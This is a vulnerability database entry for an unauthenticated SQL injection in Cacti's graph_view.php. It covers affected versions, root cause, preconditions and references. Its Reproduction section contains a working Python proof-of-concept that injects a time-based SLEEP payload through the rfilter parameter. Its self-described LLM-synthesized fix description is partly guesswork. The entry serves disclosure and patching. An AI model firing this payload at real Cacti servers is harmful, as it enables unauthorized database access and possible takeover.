Unauthenticated SQL Injection in graph_view.php in Cacti
Description
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
13<1.2.25+ 1 more
- (no CPE)range: <1.2.25
- (no CPE)range: < 1.2.25
- osv-coords11 versionspkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.4pkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.5pkg:rpm/opensuse/cacti&distro=openSUSE%20Tumbleweedpkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.4pkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.5pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2012pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP4pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP5pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2012pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP4pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP5
< 1.2.25-bp155.2.3.1+ 10 more
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-2.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
Patches
Vulnerability mechanics
Root cause
"The `grow_right_pane_tree` function in `graph_view.php` directly uses user-supplied input in a SQL query without proper sanitization."
Attack vector
The vulnerability exists in `graph_view.php` and is accessible via the `tree_content` action. Since guest users can access this page without authentication by default, an attacker can send a crafted `rfilter` parameter. This parameter is intended to be a regular expression but is improperly handled within the SQL query, allowing for SQL injection. The PoC demonstrates this by using a payload that includes a SQL `SLEEP` command, causing a noticeable delay in the response [ref_id=1].
Affected code
The vulnerability resides within the `grow_right_pane_tree` function, which is invoked from the `graph_view.php` file. Specifically, the `rfilter` parameter, after being validated by `html_validate_tree_vars` and `validate_is_regex`, is directly embedded within a SQL query using double quotes for the `RLIKE` clause in `lib/html_tree.php` [ref_id=1].
What the fix does
The advisory indicates that the issue has been addressed in version 1.2.25. While a specific patch diff is not provided, the fix likely involves more robust validation and sanitization of the `rfilter` parameter before it is incorporated into the SQL query. This would prevent malicious SQL code from being executed, thereby closing the SQL injection vulnerability [ref_id=1].
Preconditions
- configGuest user access must be enabled in the Cacti configuration.
- authNo authentication is required to access the vulnerable `graph_view.php` page.
Reproduction
```python import argparse import requests import sys import urllib3
sleep_time = 10 payload = f"""OR ""="("")));SELECT SLEEP({sleep_time});-- -"""
def exploit(): url = f"{target}/graph_view.php"
params = { "action":"tree_content", "node":"1-1-tree_anchor", "rfilter":payload }
print('[+] Sending payload...') print(f"[+] Payload: {payload}") session.get(url,params=params) if __name__=='__main__': urllib3.disable_warnings() parser = argparse.ArgumentParser(description="Cacti 1.2.24 - graph_view.php 'rfilter' SQL Injection (guest access)") parser.add_argument('-t','--target',help='',required=True) args = parser.parse_args() target = args.target session = requests.Session()
exploit() ``` [ref_id=1]
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrgmitrex_refsource_CONFIRM
- lists.debian.org/debian-lts-announce/2024/03/msg00018.htmlmitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/mitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/mitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/mitre
- www.debian.org/security/2023/dsa-5550mitre
News mentions
0No linked articles in our index yet.